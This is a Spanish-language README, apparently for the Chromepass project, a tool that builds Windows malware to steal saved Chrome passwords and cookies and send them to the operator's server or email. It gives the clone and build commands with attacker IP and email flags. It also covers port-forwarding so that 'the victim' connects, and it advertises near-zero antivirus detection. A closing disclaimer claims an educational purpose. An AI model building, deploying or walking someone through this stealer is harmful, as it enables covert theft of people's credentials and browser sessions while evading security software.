
Chromepass - Hackeando contraseñas guardadas de Chrome
Ver demo
·
Reportar error
·
Solicitar función
Chromepass es una aplicación de consola basada en Python que genera un ejecutable de Windows con las siguientes características:
La nueva metodología de construcción del cliente prácticamente garantiza una tasa de detección del 0%, incluso sin tácticas de evasión de antivirus. Si esto se vuelve falso en el futuro, se implementarán algunos métodos para mejorar la evasión de antivirus.
Un ejemplo de los últimos análisis (nota: en 10-12 horas pasamos de 0-2 detecciones a 32 detecciones, así que ejecuta el análisis en tus propias compilaciones):
Esta es una aplicación muy simple que usa solo:
Se recomienda realizar la instalación dentro de una máquina virtual Windows. Algunas partes del procedimiento de instalación pueden verse afectadas por configuraciones existentes. Esto fue probado en una VM limpia de Windows 10.
¡Chromepass requiere Windows para compilar! El soporte para Linux y macOS podría agregarse pronto.
git clone https://github.com/darkarp/chromepass
Nota: Alternativamente a clonar el repositorio, puedes descargar la última versión, ya que el repositorio puede tener más errores.
Las dependencias se verifican e instalan automáticamente, así que puedes ir directamente a Uso. Se recomienda que uses una VM limpia, solo para asegurarte de que no haya conflictos.
Si no tienes las dependencias y tu internet no es rápido, esto tomará un tiempo. Ve por un café.
Chromepass es muy sencillo. Empieza ejecutando:
python create.py -h
Aparecerá una lista de opciones que se explican por sí mismas.
Ejecutarlo sin parámetros construirá el servidor y el cliente conectándose a 127.0.0.1.
Un ejemplo simple de una compilación:
python create.py --ip 92.34.11.220 --error --message 'An Error has happened'
Después de crear el servidor y el cliente, asegúrate de que el servidor se esté ejecutando cuando se ejecute el cliente.
Las cookies y contraseñas se guardarán en archivos json en una nueva carpeta llamada data en el mismo directorio que el servidor, separadas por dirección IP.
Chromepass admite el envío de archivos por correo electrónico, aunque aún es experimental.
Para habilitarlo, puedes usar la bandera --email al crear el servidor. Necesitarás dos cosas: un nombre de usuario (tu correo electrónico) y una contraseña (una contraseña de aplicación).
Para generar una contraseña de aplicación, debes ir a la configuración de tu cuenta (account settings) -> Security y habilitar la autenticación en dos pasos (¡requerido!).
Después de habilitar la autenticación en dos pasos, verás una nueva opción llamada App Passwords:

Haz clic allí, elige las opciones correspondientes y luego genera una contraseña:

Después de hacer clic en Generate, te dará la contraseña necesaria.
Puedes usar el nombre de usuario y la contraseña directamente en el comando o simplemente colocarlos dentro del archivo config.ini, donde dice YOUR_USERNAME y YOUR_PASSWORD.
python create.py --error --message 'An Error has happened' --email --username [email protected] --password qwertyuiopasdfghh
python create.py --error --message 'An Error has happened' --email
Si deseas usar esto en un escenario remoto, también debes realizar el reenvío de puertos (puerto 80 por defecto), para que cuando la víctima ejecute el cliente pueda conectarse al servidor en el puerto correcto.
Para obtener información más general, haz clic aquí. Si aún no estás satisfecho, realiza una búsqueda en Google.
La configuración automatizada es experimental. Por una u otra razón, la configuración podría fallar al instalar correctamente las dependencias. Si ese es el caso, debes instalarlas manualmente.
Afortunadamente, solo hay 2 dependencias:
En lugar de las herramientas de compilación, también puedes instalar Visual Studio, pero ocupará más espacio.
Después de instalar correctamente las herramientas de compilación, simplemente puedes ejecutar rustup-init.exe desde el sitio web de Rustup.
Esto completa las dependencias necesarias y deberías estar listo.
Si encuentras un error o un fallo, repórtalo como un issue. Si deseas sugerir una función o una mejora, repórtalo en las páginas de issues.
Por favor, sigue las plantillas que se muestran al crear el issue.
Para acceder a una comunidad llena de aspirantes a expertos en seguridad informática, desde principiantes hasta veteranos experimentados, únete a nuestro servidor de Discord: WhiteHat Hacking
Si deseas contactarme, puedes hacerlo a través de: [email protected]
No soy responsable de lo que hagas con la información y el código proporcionados. Esto está destinado únicamente a fines profesionales o educativos.
